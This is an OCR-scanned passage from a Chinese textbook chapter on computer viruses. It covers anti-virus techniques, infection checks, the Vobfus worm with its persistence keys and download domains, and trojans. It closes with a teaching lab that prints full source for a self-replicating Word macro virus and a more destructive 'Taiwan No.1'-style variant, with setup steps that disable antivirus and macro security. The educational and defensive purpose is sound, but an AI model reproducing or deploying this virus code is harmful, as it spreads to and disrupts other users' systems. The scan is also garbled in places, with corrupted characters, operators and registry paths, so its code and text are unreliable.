些 只 是 病毒 劣迹 的 一 部 分 , 随 着 计算 机 应 用 的 发 展 , 人 们 深刻 地 认识 到 凡是 病毒 ,都 可 能 对 
计算 机 信息 系统 造成 严重 的 破坏 。 

360 安全 中 心 发 布 的 (中 国 互联 网 安全 报告 ) 显 示 ,2011 年 ,国内 每 天 开机 联网 的 电脑 
遭 到 木马 病毒 等 恶意 程序 攻击 的 比例 约 为 5.7%, 相 比 于 2010 ERK 48.0%. Hp, 1%~ 
3% 的 电脑 终端 感染 木马 病毒 的 实际 原因 主要 为 部 分 木马 利用 游戏 外 挂 、 盗 版 软件 视频 等 
诱惑 性 网 络 资源 伪装 ,欺骗 用 户 关闭 安全 软件 防护 。2011 年 ,CNCERT 全 年 共 发 现 近 890 
万 余 个 境内 主机 IP 地 址 感染 了 木马 或 僵尸 程序 , 较 2010 年 大 幅 增加 78. 5%% ,其 中 ,感染 窃 
密 类 木马 的 境内 主机 IP 地 址 为 5. 6 万 余 个 ,国家 、 企 业 以 及 网 民 的 信息 安全 面临 严重 威胁 。 


6.5 反 病 毒 技术 
6.5.1 反 病 毒 技 术 的 三 大 内 容 


计算 机 病毒 的 预防 、 检 测 和 清除 是 计算 机 反 病毒 技术 的 3 大 内 容 , 即 计算 机 病毒 的 防治 
要 从 防毒 查 毒 和 解毒 3 个 方面 来 进行 。 首 先 对 这 3 个 概念 进行 解释 。 

防毒 即 根据 系统 特性 采取 相应 的 系统 安全 措施 预防 病毒 人 侵 计 算 机 。 防 毒 能 力 是 指 预 
防 病毒 侵入 计算 机 系统 的 能 力 。 通 过 采取 防毒 措施 ,可 以 准确 .实时 地 检测 经 由 光盘 、 软 盘 、 
硬盘 等 不 同 目录 之 间 以 及 网 之 间 其 他 文件 下 载 等 多 种 方式 进行 病毒 的 传播 ,能 够 在 病毒 侵 
人 系统 时 发 出 警报 ,记录 携带 病毒 的 文件 ,及 时 清除 病毒 ; 对 网 络 而 言 , 能 够 向 网 络 管理 人 
员 发 送 关 于 病毒 人 侵 的 消息 ,记录 病毒 人 侵 的 工作 站 ,必要 时 还 能 够 注销 工作 站 ,隔离 病 
毒 源 。 

查 毒 即 对 于 确定 的 环境 ,包括 内 存 \ 文 件 . 引 导 区 / 主 引导 区 、 网 络 等 ,能 够 准确 地 报 出 病 
毒 名 称 。 查 毒 能 力 是 指 发 现 和 追踪 病毒 来 源 的 能 力 。 通 过 查 毒 ,应 该 能 够 准确 地 判断 计算 
机 系统 是 否 感染 病毒 ,能 准确 地 找 出 病毒 的 来 源 , 并 能 给 出 统计 报告 。 查 毒 能 力 应 由 查 毒 率 
和 误 报 率 来 评 断 。 

解毒 是 指 根据 不 同类 型 病毒 对 感染 对 象 的 修改 ,并 按照 病毒 的 感染 特征 所 进行 的 恢复 。 
该 恢复 过 程 不 能 破坏 未 被 病毒 修改 的 内 容 。 感 染 对 象 包括 内 存 、 引 导 区 / 主 引导 区 、 可 执行 
文件 .文档 文件 及 网 络 等 。 解 毒 能 力 是 指 从 感染 对 象 中 清除 病毒 ,恢复 被 病毒 感染 前 的 原始 
信息 的 能 力 。 解 毒 能 力 应 该 用 解毒 率 来 评判 。 


实践 


6.5.2 反 病 毒 技术 的 发 展 


自从 计算 机 病毒 诞生 以 来 ,计算 机 病毒 的 种 类 迅速 增加 ,并 迅速 蔓延 到 全 世界 ,对 计算 
机 安全 构成 了 巨大 的 威胁 。 反 病毒 技术 也 就 应 运 而 生 , 并 随 着 病毒 技术 的 发 展 而 发 展 。 

在 20 世纪 80 年 代 中 期 ,计算 机 病毒 刚刚 开始 流行 ,种 类 不 多 ,但 危害 很 大 ,往往 一 个 简 
单 的 病毒 在 短 时 间 内 就 能 传播 到 世界 上 的 各 个 国家 和 地 区 。 计 算 机 反 病 毒 工作 者 仓促 应 
战 ,很 快 编制 一 批 早 期 的 消 病毒 程序 软件 。 消 除 磁 盘 病 毒 是 病毒 传染 的 逆 过 程 。 所 谓 病 毒 
的 传染 ,是 用 一 些 非法 的 程序 和 数据 ,也 就 是 病毒 去 侵占 磁盘 的 某 些 部 位 ,而 消除 病毒 正 是 
找 出 磁盘 上 的 病毒 ,把 它们 清除 出 去 ,恢复 磁盘 的 原状 ,所 以 消 病毒 软件 就 成 了 病毒 的 克星 。 
早期 的 消 病 毒 程序 是 一 对 一 的 ,就 是 一 个 程序 消除 一 种 病毒 。 从 20 世纪 80 年 代 末 开始 , 计 
算 机 病毒 数量 急剧 膨胀 ,达到 上 千 种 ,显然 不 能 用 上 千 种 消毒 软件 去 对 抗 如 此 大 量 病毒 ,并 
且 随 着 新 病毒 的 出 现 而 不 断 升 级 。 毫 无 疑问 , 消 病毒 软件 是 对 抗 计算 机 病毒 ,彻底 解除 病毒 
危害 的 有 力 工具 。 但 美中不足 的 是 , 消 病毒 软件 只 能 检测 杀 除 已 知 病毒 ,而 对 新 病毒 却 无 能 
为 力 , 同 时 人 们 发 现 消 病毒 软件 本 身 也 会 染 上 病毒 。 于 是 反 病毒 技术 界 就 设想 能 否 研制 一 
种 既 能 对 抗 新 病毒 ,又 不 怕 病 毒 感染 的 新 型 反 病 毒 产 品 。 后 来 这 种 反 病毒 硬件 产品 研制 出 
来 了 ,就 是 防 病毒 卡 。 防 病毒 卡 确实 能 防治 很 多 新 病毒 ,并 且 不 怕 病 毒 攻击 ,在 保护 用 户 计 
算 机 信息 资源 安全 方面 起 到 一 定 作 用 。 不 幸 的 是 , 防 病毒 卡 不 能 消除 磁盘 病毒 。 从 20 世纪 
80 年 代 末 到 90 年 代 初 ,基本 上 是 消 病毒 软件 和 防 病毒 卡 并 行使 用 ,各 司 其 职 , 互 为 补充 ,成 
为 反 病 毒 工作 的 重要 工具 。 到 20 世纪 90 年 代 中 期 ,病毒 数量 、 技 术 继续 提高 ,杀毒 和 防毒 
产品 各 自分 立 使 用 已 经 很 难 满足 用 户 的 需求 ,于 是 出 现 了 “ 查 杀 防 合 一 ”的 集成 化 反 病毒 产 
品 , 把 各 种 反 病毒 技术 有 机 地 组 合 到 一 起 共同 对 计算 机 病毒 作战 。20 世纪 90 年 代 末 期 , 操 
作 系统 和 网 络 大 力 发 展 ,病毒 技术 也 获得 新 的 发 展 , 防 病毒 卡 已 失去 存在 的 价值 ,退出 历史 
舞台 ,出 现 了 具有 实时 防 病毒 功能 的 反 病毒 软件 。 可 以 肯定 的 是 ,只 要 计算 机 病毒 继续 存 
在 , 反 病 毒 技 术 就 会 继续 发 展 。 

在 病毒 的 自动 检测 技术 方面 , 反 病毒 软件 均 采 用 特征 代码 检测 法 ,也 就 是 说 , 当 扫 描 某 
程序 时 ,如 果 发 现 某 种 病毒 的 特征 代码 , 便 可 发 现 与 该 特征 码 对 应 的 计算 机 病毒 。 

早期 的 特征 代码 法 采用 的 是 单 特 征 法 ,后 来 发 展 成 为 多 特征 检查 法 ,以便 能 够 查 出 原 种 
及 其 变种 病毒 。 

随 着 计算 机 病毒 的 日 益 增 多 ,不 可 能 对 每 一 种 病毒 都 进行 分 析 消除 ,更 由 于 是 被 动 处 
理 , 很 可 能 已 对 系统 造成 不 可 恢复 的 破坏 。 因 此 ,防治 计算 机 病毒 应 尽 可 能 “ 御 病毒 于 计算 
BLZ AP". 


6.5.3 反 病 毒 技术 的 划分 


反 病 毒 技 术 可 划分 如 下 。 

。 第 一 代 反 病毒 技术 ,采取 单纯 的 病毒 特征 诊断 ,但 是 对 加 密 、 变 形 的 新 一 代 病 毒 无 能 
AJ. 

。 第 二 代 反 病毒 技术 ,采用 静态 广 谱 特征 扫描 技术 ,可 以 检测 变形 病毒 ,但 是 误 报 率 


高 ,杀毒 风险 大 。 
。 第 三 代 反 病毒 技术 ,将 静态 扫描 技术 和 动态 仿真 跟踪 技术 相 结 合 。 
。 第 四 代 反 病毒 技术 ,基于 病毒 家 族 体系 的 命名 规则 ,基于 多 位 CRC 校 验 和 扫描 机 
理 , 启 发 式 智能 代码 分 析 模 块 ,动态 数据 还 原 模块 (能 查 出 隐蔽 性 极 强 的 压缩 加 密 文 
件 中 的 病毒 ) .内存 解毒 模块 .自身 免疫 模块 等 先进 解毒 技术 ,能够 较 好 地 完成 查 解 
毒 的 任务 。 
为 了 躲 过 杀毒 软件 的 追 杀 ,很 多 病毒 木马 就 被 加 壳 ,一 旦 运行 , 则 外 壳 先 得 到 程序 控制 
权 , 由 其 通过 各 种 手段 对 系统 中 安装 的 杀毒 软件 进行 破坏 ,最 后 在 确认 安全 后 由 壳 释 放 包 庄 
在 自己 “体内 ”的 病毒 体 并 执行 。 对 付 这 种 木马 的 方法 是 使 用 具有 脱 过 能 力 的 杀毒 软件 对 系 
统 进行 保护 。 


6.6 ”病毒 的 识别 与 预防 


当 计 算 机 系统 或 文件 染 有 计算 机 病毒 时 ,需要 检测 和 消除 。 但 是 计算 机 病毒 一 旦 破坏 
了 没有 副本 的 文件 , 便 无 法 补救 。 在 与 计算 机 病毒 的 对 抗 中 ,如 果 能 采取 有 效 的 防范 措施 ， 
就 能 使 系统 不 被 染 毒 ,或 是 染 毒 之 后 损失 减少 。 


6.6.1 判断 方法 


1. 使 用 杀毒 软件 进行 磁盘 扫描 


判断 病毒 的 第 一 步 ,就 是 通过 杀毒 软件 进行 扫描 ,查看 机 器 中 是 否 存在 病毒 。 在 扫描 
前 ,最 好 先 升 级 杀毒 软件 的 病毒 库 。 


2. 查看 硬盘 容量 


对 于 自我 复制 型 病毒 ,查看 硬盘 容量 ,可 以 判断 出 是 否 感染 了 病毒 。 特 别 是 系统 盘 的 容 
量 大 小 ,用 户 一 定 要 在 平时 了 解 自己 的 系统 盘 容 量 是 多 少 。 


3. 检查 系统 使 用 的 内 存 数量 


正常 使 用 的 操作 系统 占用 的 系统 资源 是 一 定 的 ,如 果 系统 感染 了 病毒 ,病毒 肯定 会 占用 
内 存 资源 。 在 Windows 2000 或 者 是 Windows XP 系统 下 ,在 “运行 "对话 框 中 输入 cmd 命 
令 后 ,再 执行 mem 命令 即 可 。 


4. 使 用 任务 管理 器 查看 进程 数量 


{E Windows 2000 fil Windows XP 操作 系统 中 ,可 以 利用 任务 管理 器 ,查看 一 下 是 否 有 
非法 的 进程 在 运行 。 对 于 一 些 隐蔽 性 的 病毒 ,任务 管理 器 中 不 会 显示 进程 。 


5. 查看 注册 表 
部 分 病毒 的 运行 需要 通过 注册 表 加 载 , 如 恶意 网 页 病毒 都 会 通过 注册 表 加 载 ,这 些 病毒 


实践 


在 注册 表 中 的 加 载 位 置 如 下 。 

* [HKEY LOCAL MACHINE SOFTWARE N Microsoft N Windwos N Current Version V 
Run]. 
[HKEY LOCAL MACHINE V SOFTWARE N Microsoft Ñ Windwos V 


Current VersionRunOnce]. 
[HKEY LOCAL _ MACHINE V SOFTWARE N Microsoft V Windwos V 
Current VersionRunSevices ]. 
[HKEY CURRENT USERNSOFTW ARE MicrosoftV WindowsNCurrentVersionV 
Run], 
L[LHKEY CURRENT USERNSOFTWAREMMMicrosoftN WindowsN Current Version V 
RunOnce], 
[HKEY CURRENT _ USER V SOFTWARE N Microsoft \ WindowsNT V 
Current VersionVWinlogon ] ; 
[HKEY_ LOCAL _ MACHINE V SOFTWARE N Microsoft \ WindowsNT V 
Current Version V Winlogon]. 

用 户 可 以 通过 查看 注册 表 中 以 上 几 个 键 值 判断 有 没有 异常 的 程序 加 载 。 为 了 提高 判断 
的 准确 性 ,用 户 可 以 把 正常 运行 的 机 器 的 这 几 个 键 值 记录 下 来 ,以 方便 比较 。 


6. 查看 系统 配置 文件 


有 的 病毒 一 般 在 隐藏 在 System. ini, Wini. ini(Win9x/WinME) 和 启动 组 中 。System. 
ini 文件 中 有 一 个 “Shell= "项 ,Wini. ini X fF rB ff * Load — " ," Run — "Jii , 3x: 96 5 — Rt e 
在 这 些 项 目 中 加 载 它们 自身 的 程序 ,有 时 是 修改 诛 有 的 某 个 程序 。 运 行 msconfig. exe 程序 
可 以 一 项 一 项 进行 查看 。Windows 2000 操作 系统 中 没有 Msconifg 这 个 程序 ,可 以 从 
Windows XP 操作 系统 中 复制 。 


7. 观察 机 器 的 启动 和 运行 速度 


对 于 一 些 隐蔽 性 高 的 病毒 ,通过 以 上 方法 无 法 判断 时 ,可 以 根据 机 器 的 启动 和 运行 速度 
进行 判断 ,在 保证 硬件 系统 无 故障 和 软件 系统 运行 正常 的 情况 下 ,可 以 基本 断定 是 否 已 经 感 
染病 毒 。 


8. 特征 字符 串 观 察 法 


这 种 方法 主要 针对 一 些 较 特别 的 病毒 ,这 些 病 毒 人 侵 时 会 写 相应 的 特征 代码 ,如 CIH 
病毒 就 会 在 入 侵 的 文件 中 写 入 “CIH” 这 样 的 字符 串 。 对 主要 的 系统 文件 (如 Explorer. exe? 
运用 十 六 进 制 代码 编辑 器 进行 编辑 就 可 发 现 此 类 病毒 ,编辑 之 前 应 做 好 备份 。 


6.6.2 感染 病毒 后 计算 机 的 处 理 


当 系 统 感染 上 病毒 后 ,必须 采取 紧急 措施 加 以 处 理 , 利 用 一 些 简 单 的 办 法 有 时 可 以 清除 
大 多 数 的 计算 机 病毒 ,恢复 系统 受 损 部 分 。 但 对 于 网 络 系统 ,要 做 到 迅速 及 时 。 下 面 介绍 一 


般 的 处 理 方法 。 
1. 隔离 


当 某 台 计 算 机 感染 病毒 后 ,应 将 此 计算 机 与 其 他 计算 机 隔离 , 即 避 免 相 互 复制 文件 等 。 
当 网 络 中 某 个 节点 感染 病毒 时 ,中 央 控 制 系统 必须 立即 切断 此 节点 与 网 络 的 连接 ,以 避免 病 
毒 向 整个 网 络 扩散 。 


2. 报警 


病毒 被 隔离 后 ,应 立即 通知 计算 机 管理 人 员 。 报 警 的 方法 有 很 多 种 ,例如 可 以 设 署 不 同 
的 病毒 活动 的 警报 级 别 , 根 据 事件 记录 不 同 级 别 的 报警 提示 。 报 警 的 方式 可 以 是 简单 的 事 
件 记 录 、` 电 子 邮件 等 。 带 有 多 媒体 的 计算 机 还 可 以 设置 声音 报警 。 


3. 跟踪 根源 
智能 化 的 防 病毒 系统 可 以 鉴别 受 感 染 的 计算 机 和 当时 登录 的 用 户 。 
4. 修复 前 , 尽 可 能 再 次 备份 重要 数据 文件 


目前 防毒 杀毒 软件 在 杀毒 前 大 多 能 保存 重要 的 数据 和 感染 的 文件 ,以 便 在 误杀 后 或 者 
造成 新 的 破坏 时 进行 恢复 。 对 于 重要 的 系统 数据 ,建议 在 杀毒 前 进行 单独 的 手工 备份 ,不 能 
备份 在 被 感染 破坏 的 系统 内 ,也 不 应 该 与 平时 常规 备份 混在 一 起 。 


5. 不 能 清除 的 文件 需要 删除 


发 现 计算 机 病毒 后 ,一 般 应 利用 防毒 杀毒 软件 清除 文件 中 的 计算 机 病毒 ,如 果 可 执行 文 
件 中 的 计算 机 病毒 不 能 被 清除 ,那么 ,应 该 将 可 执行 文件 彻底 删除 掉 , 然 后 重新 安装 。 


6. 杀毒 后 ,重新 启动 计算 机 


这 样 做 是 为 了 再 次 用 防毒 杀毒 软件 检查 系统 中 是 否 还 存在 计算 机 病毒 ,并 确定 被 感染 
破坏 的 数据 是 否 得 到 了 恢复 。 


6.6.3 计算 机 病毒 样本 的 分 析 方法 


目前 计算 机 病毒 样本 的 分 析 方法 主要 有 注册 表 快 照 比较 .端口 通信 比较 TCP View W 
察 、Sniffer 抓 包 分 析 、Filemon 观察 病毒 的 文件 操作 、OllyDBG 字符 串 分 析 及 SSM 病毒 行为 
动态 观察 等 。 

(1) 注册 表 快 照 比 较 。 首 先 在 干净 的 虚拟 机 上 运行 Regshot, 单 击 快照 A 生成 快照 。 
之 后 在 虚拟 机 中 运行 病毒 样本 ,然后 运行 Regshot, 单 击 快照 B, 通 过 比较 获取 病毒 运行 前 
后 注册 表 的 变化 。 

(2) 通信 端口 比较 。 还 原 虚 拟 机 操作 系统 ,在 干净 的 虚拟 机 里 进入 CMD 运行 “netstat 
an 之 netstatl. txt” 命 令 ,把 这 个 文本 文件 复制 到 真实 机 。 然 后 在 虚拟 机 中 运行 病毒 样本 ,再 
次 进入 CMD 输入 “netstat an 二 netstat2. txt” 命 令 ,同样 也 把 netstat2txt 复制 到 真实 机 中 。 


实践 


最 后 在 真实 机 中 用 UltraEDit 比较 两 个 文件 ,获取 病毒 通信 端口 的 变化 。 
(3) 利用 Filemon 观察 病毒 运行 时 的 文件 操作 。 


6.7 ”蠕虫 


与 一 般 病 毒 不 同 ,蠕虫 不 需要 将 其 自身 附着 到 宿主 程序 ,计算 机 蠕虫 程序 可 以 独立 运 
行 ,并 能 把 包含 所 有 功能 的 自身 复制 ,并 通过 网 络 传播 到 其 他 计算 机 上 。 里 虫 与 病毒 的 区 别 
如 表 6-1 所 示 。 


表 6-1 蠕虫 与 一 般 病 毒 比较 


LE: LES E 一 般 病毒 

存在 形式 独立 个 体 寄生 

复制 机 制 自身 复制 插入 宿主 程序 

触发 因素 程序 自身 计算 机 使 用 者 

破坏 重点 网 络 文件 系统 

搜索 机 制 网 络 IP 扫描 本 地 文件 系统 扫描 

计算 机 使 用 者 角色 无 关 触发 者 

对 抗 主体 计算 机 用 户 , 网 络 运营 商 计算 机 用 户 
蠕虫 病毒 包括 如 下 4 个 模块 。 


。 传播 模块 : 随机 扫描 一 个 IP 网 段 或 根据 某 种 扫描 策略 来 选择 扫描 地 址 范围 。 

* 攻击 模块 一 个 可 以 利用 已 知 系统 漏洞 (Buffer overflow) 的 攻击 代码 ,以 便 能 够 远 

程控 制 机 器 。 

t 感染 模块 : 实现 使 受害 主机 执行 木马 程序 的 功能 ,完成 对 一 个 主机 的 感染 。 

。 功能 模块 : 属于 附加 功能 ,比如 在 受害 主机 加 上 后 门 或 DDoS 等 功能 。 

国家 计算 机 病毒 应 急 处 理 中 心 通过 对 互联 网 的 监测 发 现 ,2013 年 3 月 ,蠕虫 病毒 
Worm_Vobfus 及 其 变种 出 现 ,通过 可 移动 设备 传播 感染 操作 系统 。 一 旦 感染 操作 系统 ,该 
蠕虫 及 其 变种 即 会 进行 如 下 恶意 行为 。 

。 在 所 有 可 移动 设备 上 释放 自身 的 副本 。 这 些 副 本 名 字 会 使 用 受 感染 操作 系统 上 的 
文件 夹 和 文件 ,其 扩展 名 分 别 为 avi、.bmp、doc、gif、txt、exe 等 ; 它 在 受 感染 的 系统 中 
植 和 人 自身 副本 “%User Profile%\{random filename). exe", 
添加 下 列 注册 表 项 ,在 系统 每 次 启动 时 自行 执行 。 

HKEY_CURRENT_ USERN Software\Microsoft\Windows\CurrentVersion\Run{random filename) = 
" % User Profile % \ {random file name). exe" 

隐藏 上 述 类 型 的 原始 文件 和 文件 夹 ,致使 计算 机 用 户 将 病毒 文件 “{random 
filename). exe” 误 认为 正常 文件 。 解 决 方法 是 修改 下 列 注册 表 项 。 


HKEY _ CURRENT _ USER V Software V Microsoft V Windows V CurrentVersion V Explorer V 
AdvancedShowSuperHidden - "0" 


* 释放 一 个 自 启 动 配置 文件 ,文件 名 为 autorun. inf, 当 可 移动 设备 安装 成 功 后 ,自动 运 


行 恶 意 文件 。 

。 部 分 变种 会 利用 快捷 方式 漏洞 MS10-046 自动 运行 恶意 文件 ,其 扩展 名 分 别 是 
. Ink 和 . dll, 

t 蠕虫 变种 会 连接 恶意 Web 站 点 ,下 载 并 执行 恶意 软件 。 域 已 被 封 的 部 分 URL 有 


» & 


“counterstrike. ain24. com; 992/data/a" , “counterstrike. ain24. com; 992/data/c", 
“counterstrike. ain24. com;992/data/d" „udio. co. cc:992/data/a 等 。 

。 连接 互联 网 中 指定 的 服务 器 ,从 而 与 一 个 远程 恶意 攻击 者 进行 互联 通信 。 域 已 被 封 
的 部 分 服务 器 名 有 "server. et. com”、“ns3. geparlour”、“net, ns4. chhere. netnet”, 


“ns2. turehut. net” £, 


6.8 木马 


特洛伊 木马 之 名 借 自 古 希 腊 神话 (木马 屠城 计 》, 网 络 范畴 的 意思 是 “一 经 进入 ,后 患 无 
穷 "。 原 则 上 ,特洛伊 木马 只 是 一 种 远程 管理 工具 ,可 以 这 样 说 ,在 对 方 不 知情 的 情况 下 安装 
在 对 方 电脑 上 的 远程 工具 就 称 为 木马 。 其 本 身 不 具有 伤害 性 ,也 没有 感染 力 , 所 以 严格 意义 
上 不 能 称 之 为 病毒 。 当 然 ,也 有 人 称 之 为 第 二 代 病 毒 ,很 多 杀毒 软件 也 会 查 杀 一 些 知名 木 
马 , 所 以 在 一 般 情况 下 ,木马 也 可 以 称 为 病毒 。 


[3:35 6-1) Wod 宏 病毒 


Word 宏 是 指 能 组 织 到 一 起 为 独立 命令 使 用 的 一 系列 Word 指令 , 它 能 使 日 常 工作 变 得 
容易 。 本 实验 演示 了 宏 的 编写 ,通过 两 个 简单 的 宏 病毒 示例 ,说 明 宏 的 原理 及 其 安全 漏洞 和 
缺陷 ,帮助 读者 理解 宏 病 毒 的 作用 机 制 ,从 而 加 强 对 宏 病 毒 的 认识 ,提高 防范 意识 。 

【实验 目的 】 

(1) 了 解 宏 的 原理 、 安 全 漏洞 和 缺陷 。 

(2) 理解 安 病 毒 的 作用 机 制 。 

【实验 环境 】 

。 硬件 设备 : 局 域 网 ,终端 PC。 

。 系统 软件 : Windows 系列 操作 系统 。 

。 支撑 软件 : Word 2003。 

。 软件 设置 : 关闭 杀毒 软件 ; 打开 Word 2003, 选 择 “ 工 具 ” 一 “ 宏 ” 一 “安全 性 ”命令 后 

将 安全 级 别 设置 为 低 ,在 “可 靠 发 行商 ”选项 卡 中 选择 信任 任何 所 有 安装 的 加 载 项 和 
模板 ,并 选择 信任 Visual Basic 项 目的 访问 。 

实验 环境 配置 如 图 6-1 所 示 。 

【实验 内 容 】 

为 了 保证 该 实验 不 至 于 造成 较 大 的 破坏 性 ,进行 实验 感染 后 ,被 感染 终端 不 要 打开 过 多 
的 Word 文档 ,否则 清除 比较 麻烦 (对 每 个 打开 过 的 文档 都 要 进行 清除 操作 ) 。 

【任务 6-1] 

实现 自我 复制 ,感染 Word 公用 模板 和 当前 文档 。 


实践 


e 


ARR 
受 感染 终端 Word 文 档 。 ”被 感染 终端 


图 6-1 宏 病毒 传播 示意 图 
实现 代码 如 下 。 


"Micro - Virus 
Sub Document Open() 
On Error Resume Next 
Application.DisplayStatusBar - False 
Options.SaveNormalPrompt - False 
Ourcode = ThisDocument. VBProject. VBComponents(1). CodeModule.Lines(1, 100) 
Set Host = NormalTemplate. VBProject. VBComponents(1).CodeModule 
If ThisDocument - NormalTemplate Then 
Set Host = ActiveDocument. VBProject. VBComponents(1). CodeModule 
End If 
With Host 
If .Lines(1.1) «» "'Micro- Virus" Then 
.DeleteLines 1, .CountOfLines 
.InsertLines 1, Ourcode 
. ReplaceLine 2, "Sub Document Close()" 
If ThisDocument - nomaltemplate Then 
. ReplaceLine 2, "Sub Document Open()" 
ActiveDocument. SaveAs ActiveDocument.FullName 
End If 
End If 
End With 
MsgBox "MicroVirus by Content Security Lab" 
End Sub 


打开 一 个 Word 文档 ,然后 按 Alt 十 F11 键 调用 宏 编 写 窗口 (或 者 选择 “工具 ”一 “ 宏 ” 一 
Visual Basic>“ 宏 编辑 器 ”命令 ) .选择 Project" Microsoft Word Xf $2 "— ThisDocument 命 
令 后 输入 以 上 代码 ,保存 ,此 时 当前 Word 文档 就 含有 宏 病 毒 ,只 要 下 次 打开 这 个 Word X 
档 , 就 会 执行 以 上 代码 ,并 将 自身 复制 到 Normal. dot Word 文档 的 公共 模板 ) 和 当前 文档 的 
ThisDocument 中 ,同时 改变 函数 名 (模板 中 为 Document. Close. 当前 文档 为 Document _ 
Open) ,此 时 所 有 Word 文档 打开 和 关闭 时 ,都 将 运行 以 上 的 病毒 代码 。 也 可 以 加 入 适当 的 
恶意 代码 ,影响 word 的 正常 使 用 ,本 例 中 只 是 简单 的 跳出 一 个 提示 框 。 

以 上 代码 的 基本 执行 流程 如 下 。 

CD 进行 必要 的 自我 保护 ,代码 如 下 。 


Application.DisplayStatusBar - False 
Options.SaveNormalPrompt - False 


病毒 编写 者 的 自我 保护 使 得 Word 的 一 些 工具 栏 失效 ,例如 “工具 ”菜单 中 的 “ 宏 " 选 项 
被 屏蔽 ,也 可 以 通过 修改 注册 表达 到 很 好 的 隐藏 效果 。 本 例 中 屏蔽 状态 栏 ,以 免 显 示 宏 的 运 
行 状态 ,并且 修改 公用 模板 时 自动 保存 ,不 给 用 户 提示 。 

(2) 得 到 当前 文档 的 代码 对 象 和 公用 模板 的 代码 对 象 , 如 下 。 


Ourcode = ThisDocument. VBProject. VBComponents(1).CodeModule. Lines(1, 100) 
Set Host = NormalTemplate. VBProject. VBComponents(1) . CodeModule 
If ThisDocument - NormalTemplate Then 
Set Host = ActiveDocument. VBProject. VBComponents(1). CodeModule 
End If 


(3) 检查 模板 是 否 已 经 感染 病毒 ,如 果 没 有 , 则 复制 宏 病毒 代码 到 模板 ,并 且 修 改 函数 
名 ,代码 如 下 。 


With Host 
If .Lines(1.1) <> "'Micro- Virus" Then 
.DeleteLines 1, .CountOfLines 
.InsertLines 1, Ourcode 
. ReplaceLine 2, "Sub Document Close()" 
If ThisDocument - nomaltemplate Then 
. ReplaceLine 2, "Sub Document Open()" 
ActiveDocument. SaveAs ActiveDocument. FullName 
End If 
End If 
End With 


(4) 执行 恶意 代码 ,代码 如 下 。 
MsgBox "MicroVirus by Content Security Lab" 


【任务 6-2] 

实现 具有 一 定 破坏 性 的 宏 ,并 清除 宏 病毒 。 

对 上 例 中 的 恶意 代码 稍 加 修改 ,使 其 具有 一 定 的 破坏 性 。 本 例 以 著名 宏 病毒 “台湾 一 
号 ?的 恶意 代码 部 分 为 基础 ,为 降低 破坏 性 ,对 源 代 码 作 适当 修改 “台湾 一 号 " 宏 病毒 实际 
上 是 一 个 含有 恶意 代码 的 Word 自动 宏 , 其 代码 主要 是 造成 恶作剧 ,并 且 有 可 能 使 用 户 的 计 
算 机 因为 使 用 资源 枯竭 而 瘫痪 。 

完整 代码 如 下 。 

'moonlight 

Dim nm(4) 

Sub Document Open() 

'DisableInput 1 


Set ourcodemodule - ThisDocument. VBProject. VBComponents(1). CodeModule 
Set host = NormalTemplate. VBProject. VBComponents(1) . CodeModule 
If ThisDocument - NormalTemplate Then 

Set host = ActiveDocunment. VBProject. VBComponents( 1). CodeModule 
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End If 
With host 
If .Lines(1, 1) €» "'moonlight" Then 


.DeleteLines 1, .CountOfLines 

.InsertLines 1, ourcodemodule. Lines(1, 100) 

. ReplaceLine 3, "Sub Document Close()" 

If ThisDocument = NormalTemplate Then 
.ReplaceLine 3, "Sub Document Open()" 
ActiveDocument.SaveAs ActiveDocument. FullName 


End If 
End If 
End With 
Count = 0 
If Day(Now()) = 1 Then 
try: 
On Error GoTo try 
test - -1 
con - 1 
tog$ = "" 
i= 0 
While test = -1 


For i = 0 To 4 
nm(i) = Int(Rnd() * 10) 
con = con * nm(i) 
If i = 4 Then 
tog$ = tog$ + Str$ (nm(4)) + "=?" 
GoTo beg 
End If 
tog$ = tog$ + Str$ (nm(i)) + "*" 
Next i 
beg: 
Beep 
ans$ = InputBox$ ("今天 是 ”+ Date$ +", 跟 你 玩 一 个 心算 游戏 ”+ Chr $ (13) + " 若 
答 错 ,只 好 接受 震撼 教育 .….." + Chr $ (13) + tog$, "NO.1 Macro Virus") 
If RTrim$ (LTrim$ (ans$ )) = LTrim$ (Str $ (con)) Then 
Documents. Add 
Selection. Paragraphs. Alignment = wdAlignParagraphCenter 


Beep 

With Selection. Font 
.Name = " 细 明 体 " 
.Size = 16 
.Bold = 1 
.Underline - 1 

End With 


Selection. InsertAfter Text: = "何谓 宏 病 毒 ” 
Selection. InsertParagraphAfter 
Beep 
Selection. InsertAfter Text: = "答案 : " 


Selection.Font.Italic - 1 
Selection. InsertAfter Text: = "我 就 是 .……. ba 
Selection. InsertParagraphAfter 
Selection. InsertParagraphAfter 
Selection.Font.Italic - 0 
Beep 
Selection. InsertAfter Text: = "如 何 预防 宏 病 毒 " 
Selection. InsertParagraphAfter 
Beep 
Selection.InsertAfter Text: = "答案 :" 

Selection. Font. Italic = 1 
Selection. InsertAfter Text: = "不 要 看 我 ….. x 
GoTo out 
Else 

Count - Count * 1 

For j = 1 To20 

Beep 
Documents. Add 

Next j 
Selection.Paragraphs.Alignment - wdAlignParagraphCenter 
Selection. InsertAfter Text: = " 宏 病毒 " 
If Count - 2 Then GoTo out 
GoTo try 

End If 


对 每 一 个 受 感染 的 Word 文档 进行 如 下 操作 清除 宏 病 毒 。 

COD 打开 受 感染 的 Word 文档 ,进入 宏 编辑 环境 ,选择 Normal—> “Microsoft Word 对 
f£ "— This Document 命令 清除 其 中 的 病毒 代码 (只 要 删除 所 有 内 容 即 可 )。 

(2) 选择 Project Microsoft Word- This Document 命令 清除 其 中 的 病毒 代码 。 

实际 上 ,模板 的 病毒 代码 只 要 在 处 理 最 后 一 个 受 感染 文件 时 清除 即 可 ,然而 清除 模板 病 
毒 后 ,如 果 重 新 打开 其 他 已 感染 文件 ,模板 将 再 次 被 感染 ,因此 为 了 保证 病毒 被 清除 ,可 以 查 
看 每 一 个 受 感染 文档 的 模板 ,如 果 存 在 病毒 代码 ,都 进行 一 次 清除 操作 。 


恶意 代码 攻防 


【实验 目的 】 

CD 了 解 远程 控制 软件 的 编写 方法 。 

(2) 了 解 黑客 利用 流行 的 木马 软件 进行 远程 监控 和 攻击 的 方法 。 

(3) 掌握 常见 工具 的 基本 应 用 ,包括 掌握 基于 Socket 的 网 络 编程 。 

(4) 了 解 缓冲 区 溢出 攻击 的 基本 实现 方法 、 恶 意 脚本 攻击 的 基本 实现 方法 以 及 网 络 病 
毒 的 基本 特性 。 

本 次 实验 的 主要 项 目 包括 溢出 攻击 模拟 程序 的 编写 、 调 试 以 及 跨 站 恶意 脚本 的 运用 、 网 
页 脚本 攻击 。 

